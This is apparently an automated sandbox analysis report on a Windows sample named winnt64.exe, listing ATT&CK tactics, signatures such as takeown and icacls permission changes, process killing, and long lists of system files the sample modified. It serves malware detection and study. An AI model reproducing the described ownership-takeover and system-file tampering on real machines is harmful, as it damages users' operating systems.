Malware Analysis Report

2024-09-11 05:42

Sample ID 240701-cwm5datbqa
Target winnt64.exe
SHA256 dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88
Tags
defense_evasion discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88

Threat Level: Likely malicious

The file winnt64.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery exploit

Possible privilege escalation attempt

Modifies file permissions

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Kills process with taskkill

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
File and Directory Permissions Modification
T1222
Windows File and Directory Permissions Modification
T1222.001
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-07-01 02:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-01 02:25

Reported

2024-07-01 02:28

Platform

win11-20240611-en

Max time kernel

136s

Max time network

99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\winnt64.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\DELETE~1\MICROS~4.SCA\SNIPPI~1\Assets\SQUARE~2.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~4.0_X\Assets\CONTRA~2\APAE12~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\CONTRA~1\HXF724~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\HxA-Yahoo-Dark.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\HXCALE~3.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICAAC~1.0_X\Assets\AppTiles\CONTRA~1\MapsAppList.targetsize-24_altform-lightunplated_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIFEE6~1.0_X\Assets\CONTRA~2\NotepadAppList.targetsize-48.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0171~1.0_X\WebviewOffline.html C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI914F~1.0_X\Images\SQ22F9~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0BB2~1.SCA\Assets\CONTRA~2\SPLASH~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\DELETE~1\MICROS~4.SCA\Assets\CONTRA~2\SNIPSK~2.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\DELETE~1\MI6273~1.SCA\Assets\CONTRA~2\SMALLL~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIF8B8~1.0_X\Assets\WideTile.scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI91CD~1.0_X\Assets\CONTRA~2\PA93B0~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIF169~1.0_X\Assets\PhotosAppList.targetsize-20_altform-lightunplated_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3CE1~1.0_X\Assets\AL64B1~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\OUAC55~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIFEE6~1.0_X\Assets\CONTRA~1\NO40C8~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\DELETE~1\MI1EC6~1.SCA\Assets\CONTRA~2\CAMERA~3.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI369D~1.0_X\Assets\TIMER3~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\HxMailAppList.targetsize-16.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\DELETE~1\MIA2D3~1.SCA\Assets\CONTRA~2\CAMERA~3.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0311~1.0_X\Images\POWERA~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\CONTRA~1\HxCalendarAppList.targetsize-72.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI914F~1.0_X\Images\Square44x44Logo.targetsize-40.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\react\lib-amd\SEARCH~1.JS C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\react\LIB-CO~1\Panel.js C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3CE1~1.0_X\Assets\AlarmsAppList.targetsize-36_altform-unplated_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI914F~1.0_X\Images\STOREL~4.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI1864~1.0_X\Assets\CONTRA~1\OR8C3E~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIBF04~1.SCA\Assets\AppPackageSmallTile.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI05D6~1.SCA\Win10\CONTRA~2\MI9C7B~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0311~1.0_X\Images\CONTRA~2\PO38CE~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI16D7~1.0_X\Assets\CONTRA~1\AppList.targetsize-24_altform-unplated_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIC72E~1.SCA\APPXMA~1.XML C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI01ED~1.SCA\Assets\FEF02E~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI91CD~1.0_X\Assets\PaintAppList.targetsize-30_altform-lightunplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI369D~1.0_X\SNIPPI~1\Assets\Square44x44Logo.targetsize-256_altform-lightunplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIF169~1.0_X\AppCS\Assets\DEVICE~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\PHONE-~2.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI98F9~1.0_X\Assets\CONTRA~2\SplashScreen.scale-125_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\theme\NODE_M~1\@UIFAB~1\UTILIT~1\lib\dom\SETVIR~1.JS C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI369D~1.0_X\SNIPPI~1\Assets\Square44x44Logo.targetsize-48_altform-lightunplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI1677~1.0_N\APPXSI~1.P7X C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\HXA-EX~4.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\LinkedInboxWideTile.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICAAC~1.0_X\Assets\AppTiles\CONTRA~2\MA73F5~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\theme\NODE_M~1\@UIFAB~1\UTILIT~1\LIB-CO~1\dom\PORTAL~1.JS C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI369D~1.0_X\Assets\CONTRA~2\SN0352~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI9463~1.0_X\Assets\AppList.targetsize-72.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIF169~1.0_X\Assets\PHC15A~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\CONTRA~1\HXMAIL~4.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIBF04~1.SCA\APPXMA~1.XML C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI91CD~1.0_X\Assets\CONTRA~1\PaintAppList.targetsize-60_altform-lightunplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI91CD~1.0_X\Assets\CONTRA~2\PA9479~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3CE1~1.0_X\Assets\AL6320~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI4490~1.0_X\Assets\CONTRA~1\AppList.targetsize-48_altform-unplated_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI1864~1.0_X\Assets\CONTRA~1\AppList.targetsize-72_altform-unplated_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIDBBC~1.0_X\APPXME~1\CODEIN~1.CAT C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MIB101~1.0_X\Assets\Icons\STICKY~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI8B91~1.SCA\Images\CONTRA~1\PowerAutomateSquare150x150Logo.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI0311~1.0_X\Images\CONTRA~1\PO6842~1.PNG C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI47E1~1.0_X\Assets\AppTiles\CONTRA~2\StoreSplashScreen.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\WindowsApps\MI3116~1.0_X\images\OUA81D~1.PNG C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorAppList.targetsize-16_altform-unplated_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorWideTile.scale-200_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\HCWhite_Search_TraySearchBox_Glyph_100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MICROS~1.SEC\pris\resources.fi-FI.pri C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FILEEX~1\Assets\images\CONTRA~1\windows.invertselection.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\splashscreen.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\js\oobewelcome-vm.js C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\view\oobeupdatesettings-main.html C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\AppxBlockMap.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\GUIDED~1\network\AREA-C~1\zh-TW\area-content.local.json C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\toolwindow.f12.css C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\TEMPLA~1\js\common-textinput-vm.js C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorAppList.targetsize-36.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\memoryAnalyzer\memoryAnalyzerRemote.bundle.js C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.FileExplorer_cw5n1h2txyewy\Assets\SquareTile44x44.targetsize-96_altform-unplated_contrast-white_devicefamily-colorfulunplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FILEEX~1\Assets\images\CONTRA~2\THEME-~1\windows.addnetworklocation.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\GUIDED~1\network\AREA-C~1\pt-PT\area-content.local.json C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\TileSmall.contrast-black_scale-125.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\Assets\SplashScreen.Theme-Dark_Scale-180.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.targetsize-48_altform-unplated.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.FilePicker_cw5n1h2txyewy\pris\resources.en-US.pri C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Cortana.UI\Assets\Icons\AppListIcon.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\VALUEB~1\Assets\Images\OneDrive_Logo.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MICROS~1.SEC\Assets\SplashScreen.contrast-white_scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FILEEX~1\Assets\images\CONTRA~3\SortBy.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars49.contrast-black_scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\i_show_layout.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\AppxBlockMap.xml C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FILEEX~1\Assets\images\CONTRA~2\THEME-~2\windows.previewpane.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars45.contrast-black_scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorMedTile.scale-150_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Cortana.UI\Assets\splashscreen.scale-80.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\GUIDED~1\network\AREA-C~1\id-ID\area-content.local.json C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\ImmersiveControlPanel\images\logo.targetsize-60.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Microsoft.WinJS-reduced\css\ui-dark.css C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RetailDemo\retailDemoSetup.html C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MICROS~1.SEC\Assets\SplashScreen.contrast-white_scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\CONTRA~2\GetStartedMedTile.scale-100_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FILEEX~1\Assets\images\CONTRA~1\windows.ribbondelete.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\media\oobe-update-settings.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.FilePicker_cw5n1h2txyewy\Assets\SquareTile310x150.scale-400.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.FileExplorer_cw5n1h2txyewy\Assets\Folder_Small.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorAppList.targetsize-48_altform-unplated_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\CONTRA~1\GetStartedAppList.targetsize-96_contrast-black.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\CONTRA~2\GetStartedAppList.targetsize-30_altform-unplated_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\Assets\Splashscreen.scale-100.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\resources.pri C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\GUIDED~1\network\AREA-C~1\mk-MK\area-content.local.json C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.ActionCenter.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FILEEX~1\Assets\images\CONTRA~2\THEME-~2\DisplaySettings.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\GUIDED~1\network\AREA-C~1\el-GR\area-content.local.json C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\CONTRA~2\GetStartedStoreLogo.scale-400_contrast-white.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchUx.MiniUI.winmd C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\Assets\Wide310x150Logo.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\columnmove.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Microsoft.CloudExperienceHost.dll C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\SplashScreen.contrast-black_scale-140.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.Windows.FileExplorer_cw5n1h2txyewy\Assets\SquareTile150x150.scale-200.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Cortana.UI\Assets\Icons\CONTRA~1\AppListIcon.targetsize-64.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\FILEEX~1\Assets\images\CONTRA~3\windows.shortcut.opencontaining.svg C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\webapps\GUIDED~1\network\AREA-C~1\mt-MT\area-content.local.json C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WebHost.winmd C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorAppList.targetsize-24.png C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Resources\Colors_Dark.xbf C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\Taskmgr.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\system32\notepad.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Windows\system32\notepad.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Windows\system32\notepad.exe N/A
